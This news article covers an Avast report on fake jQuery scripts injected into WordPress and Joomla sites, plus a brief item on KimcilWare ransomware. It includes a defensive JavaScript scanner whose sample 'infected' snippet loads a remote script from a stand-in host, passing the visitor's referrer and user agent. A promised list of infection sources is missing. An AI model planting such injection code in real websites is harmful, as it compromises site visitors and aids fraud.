According to cybersecurity firm Avast, fake jQuery injections have become a very popular attack of late. In a blog post, the team said a particular attack method which has surged in popularity over the past few months includes the use of a fake jQuery script injected into the head section of websites powered by the WordPress and Joomla content management systems, leading to a web of infection supported by compromised and malicious domains.
When code is particularly complex, drawing on libraries such as jQuery can make the job easier, but in turn, some features in the jQuery library are open to abuse in large-scale cyberattack campaigns.
According to the researchers, fake jQuery scripts have been found in almost 70 million unique files on compromised websites. Since November 2015, a total of 4.5 million users have encountered infected websites due to the “abnormally high” number of compromised domains, researchers say.
The threat actors behind this campaign have ensured the code starts with a 10-millisecond countdown, a common practice in injection-type attacks, although a longer delay is more typical. The code then uses the “encodeURIComponent” function, which encodes special characters such as ?, : and @.
“The final condition checks if variables contain necessary values and after evaluation another source for script is inserted,” the researchers explained.
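The three traits described above (a short countdown, `encodeURIComponent`, and a conditionally inserted script source) can be turned into a simple check for webmasters, shown here as an added example that is not Avast's code or signature. The 100 ms threshold, the regexes, the sample markup and the `placeholder.invalid` host are all assumptions constructed for illustration.

```javascript
// Heuristic scanner for the injection pattern described in the article.
// Thresholds and regexes are assumptions, not Avast's detection signatures.
const MAX_DELAY_MS = 100; // assumed cut-off for a "short countdown"

// Return the bodies of inline <script> blocks (those without a src attribute).
function inlineScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].filter((m) => !/\bsrc\s*=/i.test(m[1])).map((m) => m[2]);
}

// Check one script body for the three traits named in the article.
function traits(js) {
  const delays = [...js.matchAll(/,\s*(\d+)\s*\)/g)].map((d) => Number(d[1]));
  return {
    shortTimer: /\bsetTimeout\s*\(/.test(js) && delays.some((d) => d <= MAX_DELAY_MS),
    encodesUri: /\bencodeURIComponent\s*\(/.test(js),
    insertsScript:
      /createElement\s*\(\s*["']script["']\s*\)/i.test(js) ||
      /document\.write\s*\([^)]*<script/i.test(js),
  };
}

// Flag only blocks showing all three traits; each one alone is common in benign code.
function findSuspiciousInlineScripts(html) {
  return inlineScripts(html).filter((js) => {
    const t = traits(js);
    return t.shortTimer && t.encodesUri && t.insertsScript;
  });
}

// Constructed samples (not the real payload); placeholder.invalid is a stand-in host.
const INFECTED_HEAD = `<head><title>Blog</title><script>
setTimeout(function () {
  var a = encodeURIComponent(document.referrer);
  var b = encodeURIComponent(navigator.userAgent);
  if (a && b) {
    var s = document.createElement("script");
    s.src = "http://placeholder.invalid/jquery.js?r=" + a + "&u=" + b;
    document.head.appendChild(s);
  }
}, 10);
</script></head>`;

const CLEAN_HEAD = `<head><script src="/wp-includes/js/jquery/jquery.js"></script>
<script>setTimeout(function () { console.log("ready"); }, 10);</script></head>`;

console.log(findSuspiciousInlineScripts(INFECTED_HEAD).length, "flagged in infected sample");
console.log(findSuspiciousInlineScripts(CLEAN_HEAD).length, "flagged in clean sample");
```

A hit is a reason to review the file by hand, not proof of compromise; obfuscated variants will evade a pattern match like this one.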
Once injected, the code is then used to increase the SEO rank of other domains, which could not only spread the infection further by boosting compromised websites but may also make cybercriminals money by pushing up ad-based domains or through kinds of fraud such as fake domains.
The main sources of infection are below.
Webmasters should not only clean their local machines to make sure there are no infections at home but should also perform regular scans on their websites and keep WordPress and Joomla builds up to date to protect themselves as much as possible from online threats.
Last week, researchers revealed that the Magento e-commerce platform has become the latest target for the KimcilWare ransomware. While not sophisticated and built upon code released as an educational tool, the malware is still able to compromise domains and demand payment from webmasters to restore functionality to websites.